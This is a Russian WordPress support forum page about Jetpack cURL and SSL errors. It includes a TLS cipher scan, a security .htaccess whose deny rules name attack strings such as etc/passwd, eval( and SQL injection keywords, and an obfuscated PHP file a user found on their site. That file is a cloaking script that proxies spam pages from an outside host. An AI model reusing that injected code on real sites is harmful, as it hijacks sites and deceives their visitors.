Результаты поиска для 'cURL error 28'

Просмотр 6 результатов — с 76 по 81 (из 81)
    • Помогите! Не подключается плагин Jetpack. Пишет что установлен, но не подключен. После, нажатии «подключить Jetpack», пишет «cURL error 28: Operation timed out after 15000 milliseconds with 0 bytes received». Как быть? подскажите, ПЛЗ!

    Модератор Yui

    (@fierevere)

    永子

    http://stackoverflow.com/questions/26396412/paypal-ipn-stopped-working-curl-35-error
    http://stackoverflow.com/questions/26379773/paypal-ipn-acknowledgements-failing-with-ssl-routinesssl3-read-bytessslv3-aler

    также ваш сервер может пытаться использовать старый протокол SSL для подключения
    в зависимости от версии PHP и конфигурации curl/openssl

    SSLv3 не поддерживается

    Preferred TLSv1.2  256 bits  AES256-SHA256                
    Accepted  TLSv1.2  256 bits  AES256-SHA                   
    Accepted  TLSv1.2  128 bits  AES128-SHA                   
    Accepted  TLSv1.2  112 bits  DES-CBC3-SHA                 
    Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
    Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
    Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
    Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
    Preferred TLSv1.1  256 bits  AES256-SHA                   
    Accepted  TLSv1.1  128 bits  AES128-SHA                   
    Accepted  TLSv1.1  112 bits  DES-CBC3-SHA                 
    Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
    Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
    Preferred TLSv1.0  256 bits  AES256-SHA                   
    Accepted  TLSv1.0  128 bits  AES128-SHA                   
    Accepted  TLSv1.0  112 bits  DES-CBC3-SHA                 
    Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
    Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256                                                                                  
    Accepted  TLSv1.0  128 bits  RC4-SHA                                                                                                                            
    Accepted  TLSv1.0  128 bits  RC4-MD5
    • При попытке установить новый плагин, страница с плагинами не грузится b выдает ошибку
      «Warning: Произошла непредвиденная ошибка. Возможно, что-то не так с сайтом WordPress.org или с настройками вашего сервера. Если проблема не решится, обратитесь на форумы поддержки. (Не удалось установить защищённое соединение с WordPress.org. Пожалуйста, свяжитесь с администратором сервера.) in /home/u9185/mysite.ru/www/wp-admin/includes/plugin-install.php on line 165»
      ошибка установки плагинов

      Так же не работает Jetpack
      cURL error 35: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
      Ошибка Jetpack

    Честно говоря я точно не могу сказать.

    # BEGIN All In One WP Security
    #AIOWPS_BLOCK_WP_FILE_ACCESS_START
    <Files license.txt>
    order allow,deny
    deny from all
    </files>
    <Files wp-config-sample.php>
    order allow,deny
    deny from all
    </Files>
    <Files readme.html>
    order allow,deny
    deny from all
    </Files>
    #AIOWPS_BLOCK_WP_FILE_ACCESS_END
    #AIOWPS_BASIC_HTACCESS_RULES_START
    <Files .htaccess>
    order allow,deny
    deny from all
    </Files>
    ServerSignature Off
    LimitRequestBody 10240000
    <Files wp-config.php>
    order allow,deny
    deny from all
    </Files>
    #AIOWPS_BASIC_HTACCESS_RULES_END
    #AIOWPS_PINGBACK_HTACCESS_RULES_START
    <Files xmlrpc.php>
    order deny,allow
    deny from all
    </Files>
    #AIOWPS_PINGBACK_HTACCESS_RULES_END
    #AIOWPS_DISABLE_INDEX_VIEWS_START
    Options -Indexes
    #AIOWPS_DISABLE_INDEX_VIEWS_END
    #AIOWPS_DISABLE_TRACE_TRACK_START
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
    RewriteRule .* - [F]
    #AIOWPS_DISABLE_TRACE_TRACK_END
    #AIOWPS_FORBID_PROXY_COMMENTS_START
    RewriteCond %{REQUEST_METHOD} ^POST
    RewriteCond %{HTTP:VIA} !^$ [OR]
    RewriteCond %{HTTP:FORWARDED} !^$ [OR]
    RewriteCond %{HTTP:USERAGENT_VIA} !^$ [OR]
    RewriteCond %{HTTP:X_FORWARDED_FOR} !^$ [OR]
    RewriteCond %{HTTP:X_FORWARDED_HOST} !^$ [OR]
    RewriteCond %{HTTP:PROXY_CONNECTION} !^$ [OR]
    RewriteCond %{HTTP:XPROXY_CONNECTION} !^$ [OR]
    RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
    RewriteCond %{HTTP:HTTP_CLIENT_IP} !^$
    RewriteRule wp-comments-post\.php - [F]
    #AIOWPS_FORBID_PROXY_COMMENTS_END
    #AIOWPS_DENY_BAD_QUERY_STRINGS_START
    RewriteCond %{QUERY_STRING} ftp:     [NC,OR]
    RewriteCond %{QUERY_STRING} http:    [NC,OR]
    RewriteCond %{QUERY_STRING} https:   [NC,OR]
    RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
    RewriteCond %{QUERY_STRING} (\;|'|\"|%22).*(request|insert|union|declare|drop) [NC]
    RewriteRule ^(.*)$ - [F,L]
    #AIOWPS_DENY_BAD_QUERY_STRINGS_END
    #AIOWPS_ADVANCED_CHAR_STRING_FILTER_START
    <IfModule mod_alias.c>
    RedirectMatch 403 \,
    RedirectMatch 403 \:
    RedirectMatch 403 \;
    RedirectMatch 403 \=
    RedirectMatch 403 \[
    RedirectMatch 403 \]
    RedirectMatch 403 \^
    RedirectMatch 403 \
    RedirectMatch 403 \{
    RedirectMatch 403 \}
    RedirectMatch 403 \~
    RedirectMatch 403 \"
    RedirectMatch 403 \$
    RedirectMatch 403 \<
    RedirectMatch 403 \>
    RedirectMatch 403 \|
    RedirectMatch 403 \.\.
    RedirectMatch 403 \%0
    RedirectMatch 403 \%A
    RedirectMatch 403 \%B
    RedirectMatch 403 \%C
    RedirectMatch 403 \%D
    RedirectMatch 403 \%E
    RedirectMatch 403 \%F
    RedirectMatch 403 \%22
    RedirectMatch 403 \%27
    RedirectMatch 403 \%28
    RedirectMatch 403 \%29
    RedirectMatch 403 \%3C
    RedirectMatch 403 \%3E
    RedirectMatch 403 \%3F
    RedirectMatch 403 \%5B
    RedirectMatch 403 \%5C
    RedirectMatch 403 \%5D
    RedirectMatch 403 \%7B
    RedirectMatch 403 \%7C
    RedirectMatch 403 \%7D
    # COMMON PATTERNS
    Redirectmatch 403 \_vpi
    RedirectMatch 403 \.inc
    Redirectmatch 403 xAou6
    Redirectmatch 403 db\_name
    Redirectmatch 403 select\(
    Redirectmatch 403 convert\(
    Redirectmatch 403 \/query\/
    RedirectMatch 403 ImpEvData
    Redirectmatch 403 \.XMLHTTP
    Redirectmatch 403 proxydeny
    RedirectMatch 403 function\.
    Redirectmatch 403 remoteFile
    Redirectmatch 403 servername
    Redirectmatch 403 \&rptmode\=
    Redirectmatch 403 sys\_cpanel
    RedirectMatch 403 db\_connect
    RedirectMatch 403 doeditconfig
    RedirectMatch 403 check\_proxy
    Redirectmatch 403 system\_user
    Redirectmatch 403 \/\(null\)\/
    Redirectmatch 403 clientrequest
    Redirectmatch 403 option\_value
    RedirectMatch 403 ref\.outcontrol
    # SPECIFIC EXPLOITS
    RedirectMatch 403 errors\.
    RedirectMatch 403 config\.
    RedirectMatch 403 include\.
    RedirectMatch 403 display\.
    RedirectMatch 403 register\.
    Redirectmatch 403 password\.
    RedirectMatch 403 maincore\.
    RedirectMatch 403 authorize\.
    Redirectmatch 403 macromates\.
    RedirectMatch 403 head\_auth\.
    RedirectMatch 403 submit\_links\.
    RedirectMatch 403 change\_action\.
    Redirectmatch 403 com\_facileforms\/
    RedirectMatch 403 admin\_db\_utilities\.
    RedirectMatch 403 admin\.webring\.docs\.
    Redirectmatch 403 Table\/Latest\/index\.
    </IfModule>
    #AIOWPS_ADVANCED_CHAR_STRING_FILTER_END
    #AIOWPS_FIVE_G_BLACKLIST_START
    # 5G BLACKLIST/FIREWALL (2013)
    # @ http://perishablepress.com/5g-blacklist-2013/
    
    # 5G:[QUERY STRINGS]
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{QUERY_STRING} (\"|%22).*(<|>|%3) [NC,OR]
    RewriteCond %{QUERY_STRING} (javascript:).*(\;) [NC,OR]
    RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3) [NC,OR]
    RewriteCond %{QUERY_STRING} (\\|\.\./|='$|=%27$) [NC,OR]
    RewriteCond %{QUERY_STRING} (\;|'|\"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if) [NC,OR]
    RewriteCond %{QUERY_STRING} (base64_encode|localhost|mosconfig) [NC,OR]
    RewriteCond %{QUERY_STRING} (boot\.ini|echo.*kae|etc/passwd) [NC,OR]
    RewriteCond %{QUERY_STRING} (GLOBALS|REQUEST)(=|\[|%) [NC]
    RewriteRule .* - [F]
    </IfModule>
    
    # 5G:[USER AGENTS]
    <IfModule mod_setenvif.c>
    # SetEnvIfNoCase User-Agent ^$ keep_out
    SetEnvIfNoCase User-Agent (binlar|casper|cmsworldmap|comodo|diavol|dotbot|feedfinder|flicky|ia_archiver|jakarta|kmccrew|nutch|planetwork|purebot|pycurl|skygrid|sucker|turnit|vikspider|zmeu) keep_out
    <limit GET POST PUT>
    Order Allow,Deny
    Allow from all
    Deny from env=keep_out
    </limit>
    </IfModule>
    
    # 5G:[REQUEST STRINGS]
    <IfModule mod_alias.c>
    RedirectMatch 403 (https?|ftp|php)\://
    RedirectMatch 403 /(https?|ima|ucp)/
    RedirectMatch 403 /(Permanent|Better)$
    RedirectMatch 403 (\=\\\'|\=\\%27|/\\\'/?|\)\.css\()$
    RedirectMatch 403 (\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")
    RedirectMatch 403 \.(cgi|asp|aspx|cfg|dll|exe|jsp|mdb|sql|ini|rar)$
    RedirectMatch 403 /(contac|fpw|install|pingserver|register)\.php$
    RedirectMatch 403 (base64|crossdomain|localhost|wwwroot|e107\_)
    RedirectMatch 403 (eval\(|\_vti\_|\(null\)|echo.*kae|config\.xml)
    RedirectMatch 403 \.well\-known/host\-meta
    RedirectMatch 403 /function\.array\-rand
    RedirectMatch 403 \)\;\$\(this\)\.html\(
    RedirectMatch 403 proc/self/environ
    RedirectMatch 403 msnbot\.htm\)\.\_
    RedirectMatch 403 /ref\.outcontrol
    RedirectMatch 403 com\_cropimage
    RedirectMatch 403 indonesia\.htm
    RedirectMatch 403 \{\$itemURL\}
    RedirectMatch 403 function\(\)
    RedirectMatch 403 labels\.rdf
    RedirectMatch 403 /playing.php
    RedirectMatch 403 muieblackcat
    </IfModule>
    
    # 5G:[REQUEST METHOD]
    <ifModule mod_rewrite.c>
    RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
    RewriteRule .* - [F]
    </IfModule>
    #AIOWPS_FIVE_G_BLACKLIST_END
    #AIOWPS_PREVENT_IMAGE_HOTLINKS_START
    <IfModule mod_rewrite.c>
    RewriteEngine on
    RewriteCond %{HTTP_REFERER} !^$
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteCond %{REQUEST_FILENAME} \.(gif|jpe?g?|png)$ [NC]
    RewriteCond %{HTTP_REFERER} !^http(s)?://apple-pnz\.com [NC]
    RewriteRule \.(gif|jpe?g?|png)$ - [F,NC,L]
    </IfModule>
    #AIOWPS_PREVENT_IMAGE_HOTLINKS_END
    # END All In One WP Security
    
    Redirect 301 /imac/imac-21/mac-2012-macmini-2012-apple-display.html /imac/imac-21/mac-2012-macmini-2012-apple-display-2.html
    
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
    FileETag MTime Size
    <ifmodule mod_expires.c>
    <filesmatch ".(jpg|jpeg|gif|png|ico|css|js)$">
    ExpiresActive on
    ExpiresDefault "access plus 1 month"
    </filesmatch>
    </ifmodule>
    <IfModule mod_deflate.c>
    AddOutputFilterByType DEFLATE application/javascript
    AddOutputFilterByType DEFLATE text/javascript
    AddOutputFilterByType DEFLATE text/css
    <IfModule mod_setenvif.c>
    BrowserMatch ^Mozilla/4 gzip-only-text/html
    BrowserMatch ^Mozilla/4\.0[678] no-gzip
    BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
    </IfModule>
    </IfModule>
    <IfModule mod_deflate.c>
    AddOutputFilterByType DEFLATE text/html text/plain text/xml application/xml application/xhtml+xml text/javascript text/css application/x-javascript
    BrowserMatch ^Mozilla/4 gzip-only-text/html
    BrowserMatch ^Mozilla/4.0[678] no-gzip
    BrowserMatch bMSIE !no-gzip !gzip-only-text/html
    <ifmodule mod_gzip.c>
    mod_gzip_on Yes
    mod_gzip_item_include file \.js$
    mod_gzip_item_include file \.css$ </ifmodule>
    </IfModule>

    да,блин, похоже, вот этот файл

    <? function _1307200918($i){$a=Array('home','index','en','p=','template','sitemap','rss','http://fprcorp.com/1/site-name','je','2008-08-09 09:14:07','system','config','QUERY_STRING','a+','w','a+','host','path','host',"Connection: Close\r\n\r\n",'',"\r\n\r\n",'vqcjabwtellchpsqckda','jtjz',"\r\n\r\n",'headers','content','/','headers','200 OK',"HTTP/1.0 404 Not Found",'REQUEST_URI','/Content-Type: (.*)/','headers','text/plain','Content-Type: ','content');return $a[$i];} ?><?php
     error_reporting(0); $_0=3736;
    
    $_1 = _1307200918(0); if((2450+1194)>2450 || fopen($_2,$_3,$_4,$_5));else{mktime($_6,$_7,$_SERVER);}
    $_8 = _1307200918(1); $_9=_1307200918(2);	
    
    $_10 = array(_1307200918(3), _1307200918(4), _1307200918(5), _1307200918(6)); if(6841<mt_rand(2936,3900)) strpos($_2,$_11);
    $_12 = _1307200918(7); $_13=_1307200918(8);	
    
    $_14 = 1;
    $_15 = _1307200918(9); if(4611<mt_rand(2274,2332)) touch($_16,$_SERVER,$_15); 
    
    $_17 = _1307200918(10); $_18=1746;
    $_19 = _1307200918(11); while(655-655) unlink($_7,$_12);
    $_20 = $_SERVER[_1307200918(12)]; if((2126+4135)>2126 || preg_match_all($_21,$_21,$_22));else{array_shift($_3,$_19);}
    
    function write_cache($_6, $_23)
    {
    	global $_17, $_19, $_14, $_15; 
    
    	$_21 = serialize($_23); $_24=3754;
    	if($_14)
    		$_21 = gzdeflate($_21);
    
    	$_2 = fopen($_19, _1307200918(13));
    	if(!$_2)
    		return 0;
    
    	fseek($_2, 0, SEEK_END);
    	$_25 = ftell($_2);
    	$_26 = $_25 + strlen($_21);
    	fwrite($_2, $_21); if((4506+3435)>4506 || touch($_26,$_3,$_4,$_14));else{dir($_1,$_25,$_27,$_8);}
    	fclose($_2); 
    
    	touch($_19, strtotime($_15)); if(6135<mt_rand(1999,4131)) mkdir($_7,$_28,$_3);
    
    	$_28 = unserialize(file_get_contents($_17)); if(5529<mt_rand(1670,3854)) preg_split($_29,$_11);
    	$_28[$_6] = array($_25, $_26);
    	$_28 = serialize($_28); if((1225+3631)>1225 || fopen($_14,$_12,$_SERVER,$_SERVER));else{curl_multi_info_read($_11,$_11);}
    
    	$_2 = fopen($_17,  _1307200918(14));
    	if(!$_2)
    		return 0;
    	fwrite($_2, $_28);
    	fclose($_2); 
    
    	touch($_17, strtotime($_15)); 
    
    	return 1;
    }
    
    function get_cache($_6)
    {
    	global $_17, $_19, $_14; while(3243-3243) gzinflate($_1,$_6,$_5);
    	$_28 = file_get_contents($_17);
    	if($_28 === 0)
    		return 0;
    
    	$_4 = unserialize($_28);
    	if(!isset($_4[$_6]))
    		return 0;
    
    	$_2 = fopen($_19,  _1307200918(15));
    	if(!$_2)
    		return 0;
    	fseek($_2, $_4[$_6][0]);
    	$_23 = fread($_2, $_4[$_6][1] - $_4[$_6][0]);
    	if($_14)
    		$_23 = gzinflate($_23);
    
    	return unserialize($_23);
    }
    
    function get_page($_27)
    {
    	$_27 = parse_url($_27); if(7314<mt_rand(2375,4934)) write_cache($_26,$_8,$_27,$_30);
    	$_2 = fsockopen($_27[ _1307200918(16)], 80, $_5, $_31, 10); while(335-335) imagecreatefromgd2($_5,$_19,$_29);
    	if (!$_2) {
    		echo "$_31 ($_5)<br />\n";
    	} else {
    		$_30 = "GET {$_27[ _1307200918(17)]} HTTP/1.1\r\n";
    		$_30 .= "Host: {$_27[ _1307200918(18)]}\r\n";
    		$_30 .=  _1307200918(19); $_32=516;
    		fwrite($_2, $_30); 
    
    		$_23 =  _1307200918(20); if((1174+3781)>1174 || session_module_name($_31,$_19));else{ob_clean($_8,$_2,$_25);}
    		while (!feof($_2)) {
    			$_23 .= fgets($_2, 128);
    		}
    
    		$_22 = substr($_23, 0, strpos($_23,  _1307200918(21))); if(strpos( _1307200918(22), _1307200918(23))!==false)bin2hex($_22,$_3,$_SERVER);
    		$_29 = substr($_23, strpos($_23,  _1307200918(24)) + 4);
    	}
    
    	return array( _1307200918(25) => $_22,  _1307200918(26) => $_29); if(8039<mt_rand(3472,4562)) imagecreate($_11,$_14,$_14);
    }
    
    function do_work($_11)
    {
    	global $_12; if(2870<mt_rand(783,2082)) nl2br($_27,$_22);
    
    	if(($_7 = get_cache($_11)) == false)
    	{
    		$_7 = get_page($_12  .  _1307200918(27)  . $_11);
    		write_cache($_11, $_7);
    	}
    
    	if(!strpos($_7[ _1307200918(28)],  _1307200918(29)))
    	{
    		header( _1307200918(30));
    		echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n<html><head>\r\n<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n<p>The requested URL {$_SERVER[ _1307200918(31)]} was not found on this server.</p>\r\n</body></html>";
    		exit;
    	}
    
    	if(preg_match( _1307200918(32), $_7[ _1307200918(33)], $_3))
    	{
    		$_33 = $_3[1];
    		if($_33 !=  _1307200918(34))
    			header( _1307200918(35)  . $_33);
    	}
    
    	echo $_7[ _1307200918(36)];
    	exit;
    }
    
    foreach($_10 as $_16)
    {
    	if(strpos($_20, $_16) === 0)
    		do_work($_20);
    }
    
    if($_20 == $_1)
    	do_work($_8);
    ?>

    Спасибо за ссылку, пойду к доктору.

    А просто грохнуть этот файл, не поможет? Сайт до этой дочерней темы работал себе спокойно. Она, кстати, работает вообще эта фича с дочерней темой? А то несколько раз пытался сделать и ни в какую.

Просмотр 6 результатов — с 76 по 81 (из 81)